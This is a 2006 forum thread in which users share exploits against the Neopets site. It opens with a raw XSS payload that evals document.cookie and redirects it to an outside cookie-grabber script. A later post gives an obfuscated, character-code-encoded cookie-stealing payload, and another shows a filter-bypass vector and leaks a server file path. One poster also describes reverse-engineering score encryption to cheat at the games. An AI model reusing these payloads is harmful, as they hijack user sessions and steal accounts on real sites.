<body onFocus="cs='docu'.concat('men','t.','cook','ie'); cook=eval (cs); URL='http://xss.awardspace.com/new/cgrab.php?c='; location.href=URL.concat(escape(cook));">
Assorted Neopets Exploits
Posted 09 February 2006 - 07:17 PM
Posted 11 February 2006 - 07:44 AM
Mmm, I do wonder if these methods still work...
Apage: Does that still work? I'd like to know how the encryption was cracked.
The encryption was just reverse engineered. echeese used an ActionScript decompiler on the Flash file and ported the resulting code to PHP, then we screwed with the functions till we figured out how it actually used them, sniffed a score submission, decoded it, and figured out what it all meant.
I dunno if it still works, I haven't used it in a long time, I haven't played NP in over a year.
If the encryption's been changed I'm sure it's still vulnerable to the same method of decompiling and reversing.
Posted 11 February 2006 - 01:19 PM
<body C=">" onLoad="test1 = new Array(5) test1 = "document.location=String.fr"; test1 = "om.CharC"; test1 = "ode(39,109,97,108,46,97,119,97,114,100,115,112,97,99,101,46,99,111,109,47,99,103 ,46,112,104,112,63,99,61,39)doc"; test1 = "ument.co"; test1 = "okie"; document.write(test1,test1,test1,test1,test1,test1); >
Posted 12 February 2006 - 12:46 PM
<body C=">" onLoad="alert('hi');"> won't work, but:
<body C=">" onLoad="alert('hi');" X="<" > will.....
[EDIT]: While trying a few more vectors (some of which worked, but there is no need to post them since the one above works), by some luck I came across this error message:
Fatal error: Unknown function: t me() in /home/neopets/public_html/include/global.functions.inc on line 1450
Which in itself doesn't mean anything, but the file exists, and while it doesn't actually show anything (just returns a blank page, must have configured the server to parse .inc files as .php files as well, or something similar), that's the location of the functions, so yeah, if it helps anyone *shrug*....
Edited by kuza55, 12 February 2006 - 11:13 PM.
Posted 20 February 2006 - 05:18 PM
Posted 20 February 2006 - 06:14 PM